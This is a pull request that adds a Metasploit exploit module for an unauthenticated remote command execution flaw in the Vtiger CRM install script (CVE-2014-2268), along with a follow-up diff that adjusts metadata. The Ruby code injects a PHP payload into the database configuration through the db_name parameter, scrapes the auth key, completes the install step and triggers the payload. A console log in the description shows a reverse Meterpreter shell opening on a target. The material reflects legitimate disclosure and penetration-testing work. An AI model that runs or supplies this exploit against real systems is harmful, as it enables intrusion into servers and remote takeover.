### PR TITLE
Add vtiger install rce 0 day

### DIFF
--- a/modules/exploits/multi/http/vtiger_install_rce.rb
+++ b/modules/exploits/multi/http/vtiger_install_rce.rb
@@ -1,0 +1,112 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking # Application database configuration is overwritten
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Vtiger install unauthenticated Remote Command Execution',
+      'Description'    => %q{
+        This module exploits an arbitrary command execution vulnerability in the
+        Vtiger install script. This module is set to ManualRanking due to this
+        module overwriting the target database configuration, which may introduce target
+        instability.
+      },
+      'Author'         =>
+        [
+          'Jonathan Borgeaud < research[at]navixia.com >', # Navixia Research Team
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2014-2268' ],
+          [ 'URL', 'https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html'],
+          [ 'URL', 'http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html'],
+
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Payload'        =>
+        {
+          'Space'       => 4000,
+          'BadChars'    => "#",
+          'DisableNops' => true,
+          'Keys'        => ['php']
+        },
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'Vtiger 6.0.0 or older', { }]],
+      'DisclosureDate' => '05.03.2014',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to Vtiger', '/'])
+        ], self.class)
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    return Exploit::CheckCode::Unsupported
+  end
+
+  def exploit
+    print_status("Injecting payload...")
+    rand_arg = Rex::Text.rand_text_hex(10)
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(uri, 'index.php'),
+      'vars_get' =>
+      {
+        'module'      => 'Install',
+        'view'      => 'Index',
+        'mode'      => 'Step5',
+        'db_name'      => "127.0.0.1'; if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } // ",
+      },
+      'headers'      => {'X-Requested-With' => 'whatever'}
+    })
+
+    re_authkey='(name)(=)(")(auth_key)(")(\\s+)(value)(=)(").*?((?:[a-z0-9]*))(")'
+    m=Regexp.new(re_authkey,Regexp::IGNORECASE);
+
+    if m.match(res.body)
+        authkey=m.match(res.body)[10]
+        phpsessid=res.get_cookies
+        print_status("Retrieved Authkey : #{authkey}");
+        print_status("Retrieved PHPSESSID : #{phpsessid}");
+
+        send_request_cgi({
+          'method'    => 'GET',
+          'uri'       => normalize_uri(uri, 'index.php'),
+          'vars_get' =>
+          {
+            'module'      => 'Install',
+            'view'      => 'Index',
+            'mode'      => 'Step7',
+            'auth_key' => authkey
+          },
+          'headers'      => {'X-Requested-With' => 'pwned'},
+          'cookie'   => phpsessid
+        })
+
+        print_status("Executing payload...")
+        send_request_cgi({
+          'method'    => 'GET',
+          'uri'       => normalize_uri(uri, 'config.inc.php'),
+          'vars_get'  =>
+          {
+            rand_arg => '1',
+          }
+        })
+    end
+  end
+end

--- a/modules/exploits/multi/http/vtiger_install_rce.rb
+++ b/modules/exploits/multi/http/vtiger_install_rce.rb
@@ -12,7 +12,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Vtiger install unauthenticated Remote Command Execution',
+      'Name'           => 'Vtiger Install Unauthenticated Remote Command Execution',
       'Description'    => %q{
         This module exploits an arbitrary command execution vulnerability in the
         Vtiger install script. This module is set to ManualRanking due to this
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
         },
       'Arch'           => ARCH_PHP,
       'Targets'        => [[ 'Vtiger 6.0.0 or older', { }]],
-      'DisclosureDate' => '05.03.2014',
+      'DisclosureDate' => 'Mar 5 2014',
       'DefaultTarget'  => 0))
 
       register_options(


### PR DESCRIPTION
Tested successfully on vtiger 6.0.0.

This modules exploit a vulnerability that we discover in vitger.
To test it, just install the vtiger open source from https://www.vtiger.com/open-source-downloads/ without the security patch (it's the patch for this vulnerability).

here is the option:

```
msf > use exploit/multi/http/vtiger_install_rce 
msf exploit(vtiger_install_rce) > show options

Module options (exploit/multi/http/vtiger_install_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        Use a proxy chain
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to Vtiger
   VHOST                       no        HTTP server virtual host
```

And exploitation:

```
msf > use exploit/multi/http/vtiger_install_rce 
msf exploit(vtiger_install_rce) > set RHOST 192.168.134.45
RHOST => 192.168.134.45
msf exploit(vtiger_install_rce) > exploit

[*] Started reverse handler on myipxD:4444 
[*] Injecting payload...
[*] Retrieved Authkey : 8f3f9493cedf582547f181f1a3f56863
[*] Retrieved PHPSESSID : PHPSESSID=39679bdd53412f385b634;
[*] Executing payload...
[*] Sending stage (39848 bytes) to 192.168.134.45
[*] Meterpreter session 1 opened (myipxD:4444 -> 192.168.134.45:46751) at 2014-04-06 12:37:41 +0200
meterpreter > BOOM \o/
```
